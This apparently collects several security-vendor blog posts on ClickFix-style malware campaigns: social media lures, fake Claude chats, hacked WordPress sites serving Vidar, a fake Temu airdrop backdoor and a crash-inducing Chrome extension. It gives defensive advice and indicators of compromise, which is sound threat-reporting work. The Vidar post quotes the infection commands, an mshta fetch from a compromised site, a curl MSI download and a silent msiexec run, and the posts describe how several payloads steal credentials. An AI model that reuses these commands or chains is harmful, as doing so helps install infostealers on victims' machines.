Reading view

Free Spotify Premium hacks on social media are spreading infostealers

Short-form video platforms like TikTok and Instagram Reels have become the latest way cybercriminals spread malware.

We’ve already seen attackers move away from traditional phishing emails and toward tactics that trick people into installing malware themselves. Now they’re being lured with slick social media videos that promise free Spotify Premium, free Windows activation, or free Microsoft Office, but instead leave people with infostealers on their Windows devices.

Researchers at ReversingLabs uncovered two active campaigns that use short videos to trick users into running dangerous PowerShell commands or visiting malicious download sites. Similar campaigns have been reported by other researchers and national cybersecurity agencies, suggesting a growing trend: Cybercriminals are learning how to use social media algorithms just as effectively as marketers.

In true social media fashion, the videos on platforms like TikTok and Instagram Reels claim to solve a problem you didn’t know you had. The catch is that following the instructions delivers malware to your device.

How the scam works

The first campaign looks deceptively professional.

Accounts with names like “windows.tips” or “windows.insights” use Windows-style branding and post polished tutorial videos that resemble genuine tech support content. The videos are tagged with Windows and Office-related keywords so they appear alongside legitimate troubleshooting and tips content.

The videos promise to unlock Spotify Premium, Microsoft Office, or Windows for free. Viewers are then guided through step-by-step instructions that include opening Powershell, a legitimate Windows admin tool, and pasting in commands. Those commands download and run malware, much like the ClickFix scams we’ve covered before.

The malware was identified as Vidar, an infostealer designed to steal sensitive informtion from infected devices. Vidar commonly targets:

  • Saved browser passwords
  • Autofill data
  • Browser cookies
  • Cryptocurrency wallets
  • Two-factor authentication (2FA) data
  • TOR browser data

The stolen information is then sent back to servers controlled by the attackers.

How to stay safe

Research into similar TikTok-based attacks shows these scripts commonly add exclusions to Windows Defender, making it harder for security software to detect future malicious activity.

Fortunately, there are  a few simple ways to protect yourself:  

  • Only download software from official vendor websites.  
  • Be skeptical of “free”, cracked, or unofficial versions of paid software. 
  • Don’t follow instructions on a webpage without thinking them through, especially if the page asks you to run commands on your device or copy and paste code. Many ClickFix pages use countdowns, fake user counters, or other pressure tactics to make you act quickly.
  • Check that downloaded files match what you expected to download.
  • Verify a file’s publisher and digital signature before you run it. On Windows, you can usually check this by right-clicking the file, selecting Properties > Digital Signatures. Keep in mind that a valid signature does not guarantee a file is safe, but missing or suspicious signatures are often a red flag. 
  • Use a real-time, up-to-date anti-malware solution to block malware like infostealers before it runs.

Pro tip: If you’re unsure whether a video, message, or website is legitimate, you can ask Malwarebytes Scam Guard about it. It can help identify suspicious content and advise you on what to do next.

Image courtesy of ReversingLabs


We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

  •  

Fake Claude search results lure Mac users into ClickFix attack

Researchers found that cybercriminals are using sponsored search results and shared Claude chats to lure victims into a typical ClickFix attack to install malware on macOS devices.

ClickFix is a social engineering method that tricks users into infecting their own device with malware. Users are instructed to run specific commands that will download malware, usually an infostealer.

The researchers found that when users search for terms like “Claude Mac download,” they may see sponsored Google results that appear to go to the legitimate claude.ai domain.

In reality, the ads resolve to real Claude shared chats, set up to look like official “Claude Code on Mac” or Apple Support guides. Independent research by BleepingComputer found another chat serving the same purpose. The chat instructs victims to open Terminal and paste a base64‑encoded command, which pulls a loader shell script from attacker‑controlled infrastructure and runs it in memory.

The script then profiles the system, pulls down a second-stage payload and runs it through osascript, macOS’s built-in scripting engine. This gives the attacker remote code execution (RCE) without ever dropping a traditional application or binary.

This results in a MacSync‑style payload that harvests browser credentials, cookies, Keychain contents, and crypto wallet data, bundles it, and sends all that information over HTTP to attacker servers.

How to stay safe

Users running macOS Tahoe 26.4 and later will see warnings about possible ClickFix attacks, but other users still have to rely on common sense.

With ClickFix running rampant and inventing new methods all the time, it’s important to stay aware, cautious, and protected.

  • Slow down. Don’t rush to follow instructions on a webpage or prompt, especially if it asks you to run commands on your device or copy and paste code. Attackers rely on urgency to bypass your critical thinking, so be cautious of pages urging immediate action. Sophisticated ClickFix pages add countdowns, user counters, or other pressure tactics to make you act quickly.
  • Avoid running commands or scripts from untrusted sources. Never run code or commands copied from websites, emails, or messages unless you trust the source and understand what the action does.
  • Verify instructions independently. If a website tells you to execute a command or perform a technical action, check through official documentation or contact support before proceeding.
  • Limit copy and paste for commands. Manually typing commands instead of copy and paste can reduce the risk of unknowingly running malicious payloads hidden in copied text.
  • Secure your devices. Use an up-to-date, real-time anti-malware solution with web protection. Malwarebytes blocks connections to unsafe sites like these.
    Malwarebytes blocks one of the domains still active
  • Educate yourself on evolving attack techniques. Understanding that attacks may come from unexpected places helps maintain vigilance. Keep reading our blog!
  • Stay away from sponsored ads in search results. Anyone can buy them and make them look legitimate.

Pro tip: The free Malwarebytes Browser Guard extension warns you when a website tries to copy something to your clipboard.


Stop threats before they can do any harm.

Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →

  •  

Hacked sites deliver Vidar infostealer to Windows users

In recent years, ClickFix and fake CAPTCHA techniques have become a popular way for cybercriminals to distribute malware. Instead of exploiting a technical vulnerability, these attacks rely on convincing people to run malicious commands themselves.

Our researchers have recently detected a campaign that ultimately delivers the Vidar infostealer, using several different infection chains.

One of the methods used in this campaign involves installing a malicious installer delivered through fake CAPTCHA pages hosted on compromised WordPress websites. We detected a number of compromised websites involved in the campaign, located in countries including Italy, France, the United States, the United Kingdom, and Brazil.

What is Vidar?

Vidar is a well-known infostealer malware family designed to harvest sensitive data from infected systems. It typically targets:

  • Browser-stored usernames and passwords
  • Cryptocurrency wallet information
  • Session cookies and authentication tokens
  • Autofill data and saved payment information
  • Files that may contain sensitive data

Because Vidar loads in memory and communicates with remote command servers, it can quietly collect and exfiltrate data without obvious signs of infection.

Fake CAPTCHA: the never-ending story

When a user visits a compromised website, they may see a screen mimicking Cloudflare’s familiar “Verifying you are human” page.

This technique has been widely used since 2024 and has evolved through numerous variations over time, both in its visual appearance and in the malicious commands that start the infection chain.

Verify you are human
The fake CAPTCHA message shown to the user.

The page instructs the visitor to copy and run a malicious command that starts the infection chain, in this case:

mshta https://{compromised website}/challenge/cf

Mshta is a legitimate Windows binary designed to execute Microsoft HTML Application (HTA). Because it is built into Windows, attackers have abused it since the early days of the ClickFix campaigns.

In this case, the command launches a simple obfuscated HTA script, which eventually downloads and installs malware associated with the Vidar infostealer.

HTA-based MSI dropper

The HTA script is the intermediate stage that downloads and runs a malicious MSI installer. An MSI is a Windows installation package normally used to install software, but attackers frequently abuse it to deliver malware.

The script performs several operations:

  • The window is resized to 0x0 and moved off-screen, making the application invisible to the user.
  • The script terminates if the document.location.href doesn’t start with http.
  • The strings are decoded using XOR and a random key.
  • Through WMI queries, the script checks for installed antivirus products.
  • It creates hidden working folders in a random folder under \AppData\Local to drop the MSI file.
  • In the end, the script downloads the malicious MSI from a compromised website. The downloaded file must be larger than 100 KB to be considered valid. Finally, it removes the :Zone.Identifier alternate data stream.
The malicious HTA script
The malicious HTA script.

In this case, the malicious MSI was downloaded using the following command:

C:\Windows\System32\curl.exe" -s -L -oC:\Users\user\AppData\Local\EdgeAgent\WebCore\cleankises.msihttps://{compromised-website}/474a2b77/5ef46f21e2.msi

Afterward, the malicious MSI was executed with:

"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\EdgeAgent\WebCore\cleankises.msi" /qn

MSI and GoLang loader

The MSI defines a CustomAction ConfigureNetFx, and it executes a GoLang loader.

Malware loaders (also known as droppers or downloaders) are common tools in the cybercrime ecosystem. Their main job is to stealthily compromise a system and then deliver one or more additional malware payloads.

In this campaign, the loader ultimately decrypts and executes the Vidar infostealer. The executable has different names in the different MSI samples analyzed.

The custom action defined in the MSI.
The custom action defined in the MSI.

The Golang loader decodes a shellcode that performs different anti-analysis checks, including:

CheckRemoteDebuggerPresent

IsDebuggerPresent

QueryPerformanceCounter

GetTickCount

After several intermediate steps, the loader decrypts and loads Vidar infostealer directly into memory.

Analysis of compromised websites

The malicious iframe injected into the compromised websites was generated by the domains cdnwoopress[.]com or woopresscdn[.]com in the analyzed cases.

The malicious iframe injected into the compromised website.
The malicious iframe injected into the compromised website.

The injected code has several functions, and the command used in the fake CAPTCHA attack is obtained from the /api/get_payload endpoint.

Code injected into the compromised websites.
Code injected into the compromised websites.

Because the malicious website was misconfigured, we were able to view the backend code injected into the compromised WordPress sites.

The injected script performs several actions:

  • Creates the file wp-cache-manager.php if it doesn’t already exist, obtaining its contents from the endpoint /api/plugin.
  • Sends a heartbeat request every hour containing the domain name, site URL, WordPress version, and status.
  • During page loads (template_redirect), the script filters visitors based on User-Agent and targets Windows desktop visitors.
  • Requests /api/inject?domain=domain from the remote command server. The response HTML is then displayed, replacing the normal WordPress page.
The malicious code injected in the compromised WordPress site.
The malicious code injected in the compromised WordPress site.

How to stay safe

Attacks like this rely on tricking people into running commands themselves, so a few simple precautions can make a big difference.

  • Slow down. If a webpage asks you to run commands on your device or copy and paste code, pause and think before following the instructions. Cybercriminals often create a sense of urgency with fake security checks, countdown timers, or warnings designed to make you act without thinking.
  • Never run commands from untrusted sources. A legitimate website should never require you to press Win+R, open Terminal, or paste commands into PowerShell just to verify you are human. If a page asks you to do this, treat it as suspicious.
  • Verify instructions independently. If a website tells you to execute a command or perform a technical action, check official documentation or contact support through trusted channels before doing anything.
  • Be cautious with copy and paste. Some attacks hide malicious commands in copied text. If you ever need to run a command from documentation, typing it manually can help reduce the risk of running hidden code.
  • Protect your device. Keep your operating system and browser updated and use security software that can block malicious websites and detect infostealer malware.
  • Stay informed. Techniques like fake CAPTCHA pages and ClickFix attacks continue to evolve. Knowing that attackers may try to trick you into running commands yourself can help you spot these scams before they succeed.

Pro tip: The free Malwarebytes Browser Guard extension can warn you if a website attempts to copy content to your clipboard, which may help prevent this type of attack.

Indicators of Compromise (IOCs)

Domains

  • cdnwoopress[.]com: Fake CAPTCHA Infrastructure
  • woopresscdn[.]com: Fake CAPTCHA Infrastructure
  • walwood[.]be: Fake CAPTCHA Infrastructure
  • telegram[.]me/dikkh0k: Vidar C2
  • telegram[.]me/pr55ii: Vidar C2
  • steamcommunity[.]com/profiles/76561198742377525: Vidar C2
  • steamcommunity[.]com/profiles/76561198735736086: Vidar C2

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

  •  

Attackers impersonate Temu in ClickFix $Temu airdrop scam

Update Friday, March 13: A Temu spokesperson contacted us to say: “Temu has not issued any cryptocurrency, token, or digital asset—including any so-called “Temu Coin.” Any airdrop, wallet claim, or cryptocurrency offer purporting to be from Temu is fraudulent and has no connection to our company.”

We’ve covered ClickFix campaigns before: the fake CAPTCHAs, the fake Windows updates, the trick of getting victims to paste malicious commands into their own machines. Now we’ve identified a campaign that uses the opening initial steps seen in ClickFix attacks, but what happens after is different enough to warrant a closer look.

It starts with a convincing fake website promoting a $TEMU airdrop, a fabricated cryptocurrency that uses the name of the well-known shopping platform TEMU. It ends with a remote-access backdoor that checks in with its operators and runs instructions streamed from the internet instead of storing them locally, making it much harder for traditional antivirus tools to detect.

Same opener, different game

Fake $TEMU Airdrop crypto site

If you’ve read our earlier coverage of ClickFix, you know the drill: a webpage that looks like a security check, instructions to press Win+R and paste something, and the user ends up executing a malicious command on their own system. 

This campaign’s lure is a polished fake website that mimics a $TEMU cryptocurrency airdrop. “Discover Exclusive $TEMU Airdrop,” it announces, complete with a logo and navigation bar designed to look like a legitimate crypto project. There is no such coin. The site exists purely to get visitors to click a fake “I’m not a robot” checkbox.

Complete these verification steps

Clicking it triggers a modal titled “Complete these Verification Steps,” which walks the victim through opening a command prompt window using Win+R, then pressing Ctrl+V to paste whatever is waiting on their clipboard and hitting Enter.

For anyone who hesitates, there is a “Video Instructions” button that expands an embedded screen recording demonstrating each keypress in sequence. It’s effectively a help-desk style tutorial guiding victims through executing the attackers’ command. At the bottom of the modal, a fake reCAPTCHA badge reads “Verification ID: 4963,” lending it the appearance of a legitimate security check. What sets this campaign apart is everything that happens after that Enter key is pressed.

First, the malware identifies the host

power

Earlier in the infection chain, the loader collects basic host information and sends it to the command server. The payload returned by the server already contains a unique identifier assigned to the victim machine. In the decoded PowerShell stage, this appears as a variable such as $machine_id, which is embedded directly in the script delivered to the infected system.

Embedding a unique identifier in the returned payload allows the attackers to track individual infections from the moment a machine first checks in. Because this identifier is inserted into the script before it reaches the victim, the server can generate slightly different payloads for different systems.

This matters more than it sounds. Security companies maintain shared databases of known-bad files. When a malicious file is identified, its fingerprint can be added to those databases within hours. If attackers generate slightly different versions of a payload for different victims, traditional file-hash-based detection becomes far less effective because there is no single file signature for defenders to block.

A windowless house guest

With the profiling done, the campaign deploys its backdoor using a bundled Python runtime. This is the same programming language used every day by millions of developers and students. It arrives self-contained, needs no administrator permissions, and does not typically appear as a traditional installed application. The version that actually runs is called pythonw.exe, where the “w” stands for “windowless.” No console, no sound, and nothing in the taskbar.

Earlier Python-based ClickFix campaigns that have been documented delivered a static Python file that performed a fixed task. This campaign appears to take a different approach. Each time the hidden process checks in with the server, it retrieves a new piece of Python code and executes it directly in memory rather than storing it as a persistent script on disk.

This architecture allows the attackers to change the malware’s behavior simply by modifying the code delivered by the server. Different victims can receive different instructions, and the functionality of the infection can be altered without updating anything already present on the compromised machine.

What they can do with an open door

Because the server can send any Python code it likes, the attackers’ capabilities are largely determined by whatever code the command server delivers. In campaigns using similar backdoors, attackers have been observed stealing browser credentials and session cookies, recording keystrokes, taking screenshots, and using the foothold to reach other machines on the same network. The campaign also included infrastructure to notify the attackers via Telegram the moment a new victim checked in—though a debug flag in the decoded payload was set to disabled, suggesting either a campaign in active development or deliberate operational caution.

Python also makes for convenient camouflage. Many corporate security systems include it on their list of trusted applications that are allowed to reach the internet without scrutiny. A Python process sending data outbound can look, at a glance, like a developer running a routine script. Detecting this type of activity typically requires behavior-based monitoring rather than file-signature scanning, making it harder to detect for most security tools.

ClickFix keeps evolving

ClickFix campaigns keep evolving because the core trick sidesteps technical defenses entirely. The victim executes the malicious command themselves.

Earlier this year we covered how attackers switched from PowerShell to nslookup after security software began detecting the original technique. This campaign tackles the same problem from a different angle: instead of changing how the malware is delivered, it tries to ensure there is no stable file left behind.

The backdoor receives instructions dynamically rather than storing them on disk, and the payload can vary for each victim. Without a consistent file to analyze, traditional file-signature detection has much less to work with.

How to stay safe

Here’s some general ClickFix advice that should help you avoid falling victim:

  • Slow down. Don’t rush to follow instructions on a webpage or prompt, especially if it asks you to run commands on your device or copy-paste code. Attackers rely on urgency to bypass your critical thinking, so be cautious of pages urging immediate action. Sophisticated ClickFix pages add countdowns, user counters, or other pressure tactics to make you act quickly.
  • Avoid running commands or scripts from untrusted sources. Never run code or commands copied from websites, emails, or messages unless you trust the source and understand the action’s purpose. Verify instructions independently. If a website tells you to execute a command or perform a technical action, check through official documentation or contact support before proceeding.
  • Limit the use of copy-paste for commands. Manually typing commands instead of copy-pasting can reduce the risk of unknowingly running malicious payloads hidden in copied text.
  • Secure your devices. Use an up-to-date, real-time anti-malware solution with a web protection component.
  • Educate yourself on evolving attack techniques. Understanding that attacks may come from unexpected vectors and evolve helps maintain vigilance. Keep reading our blog!

Pro tip: Did you know that the free Malwarebytes Browser Guard extension warns you when a website tries to copy something to your clipboard?

If you think you’ve been affected

However, if you are past that point and suspect this specific campaign, here is what to check.

  • Look inside %LOCALAPPDATA%\Programs\Python\ for a folder called Python3133 that you did not install. That is the malware’s Python runtime.
  • Open %TEMP% and look for a file called temp_settings. Its presence is the tracking marker this campaign leaves behind.
  • Open Task Manager, go to the Startup tab, and look for pythonw.exe running from an AppData or Program Files\Python3133 location.
  • Change passwords for important accounts from a clean device and revoke active sessions where possible.

Indicators of Compromise (IOCs)

Domains

• temucoin[.]lat


We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

  •  

Fake extension crashes browsers to trick users into infecting themselves

Researchers have found another method used in the spirit of ClickFix: CrashFix.

ClickFix campaigns use convincing lures—historically “Human Verification” screens—to trick the user into pasting a command from the clipboard. After fake Windows update screens, video tutorials for Mac users, and many other variants, attackers have now introduced a browser extension that crashes your browser on purpose.

Researchers found a rip-off of a well-known ad blocker and managed to get it into the official Chrome Web Store under the name “NexShield – Advanced Web Protection.” Strictly speaking, crashing the browser does provide some level of protection, but it’s not what users are typically looking for.

If users install the browser extension, it phones home to nexsnield[.]com (note the misspelling) to track installs, updates, and uninstalls. The extension uses Chrome’s built-in Alarms API (application programming interface) to wait 60 minutes before starting its malicious behavior. This delay makes it less likely that users will immediately connect the dots between the installation and the following crash.

After that pause, the extension starts a denial-of-service loop that repeatedly opens chrome.runtime port connections, exhausting the device’s resources until the browser becomes unresponsive and crashes.

After restarting the browser, users see a pop-up telling them the browser stopped abnormally—which is true but not unexpected— and offering instructions on how to prevent it from happening in the future.

It presents the user with the now classic instructions to open Win+R, press Ctrl+V, and hit Enter to “fix” the problem. This is the typical ClickFix behavior. The extension has already placed a malicious PowerShell or cmd command on the clipboard. By following the instructions, the user executes that malicious command and effetively infects their own computer.

Based on fingerprinting checks to see whether the device is domain-joined, there are currently two possible outcomes.

If the machine is joined to a domain, it is treated as a corporate device and infected with a Python remote access trojan (RAT) dubbed ModeloRAT. On non-domain-joined machines, the payload is currently unknown as the researchers received only a “TEST PAYLOAD!!!!” response. This could imply ongoing development or other fingerprinting which made the test machine unsuitable.

How to stay safe

The extension was no longer available in the Chrome Web Store at the time of writing, but it will undoubtedly resurface with an other name. So here are a few tips to stay safe:

  • If you’re looking for an ad blocker or other useful browser extensions, make sure you are installing the real deal. Cybercriminals love to impersonate trusted software.
  • Never run code or commands copied from websites, emails, or messages unless you trust the source and understand the action’s purpose. Verify instructions independently. If a website tells you to execute a command or perform a technical action, check through official documentation or contact support before proceeding.
  • Secure your devices. Use an up-to-date real-time anti-malware solution with a web protection component.
  • Educate yourself on evolving attack techniques. Understanding that attacks may come from unexpected vectors and evolve helps maintain vigilance. Keep reading our blog!

Pro tip: the free Malwarebytes Browser Guard extension is a very effective ad blocker and protects you from malicious websites. It also warns you when a website copies something to your clipboard and adds a small snippet to render any commands useless.


We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

  •  
❌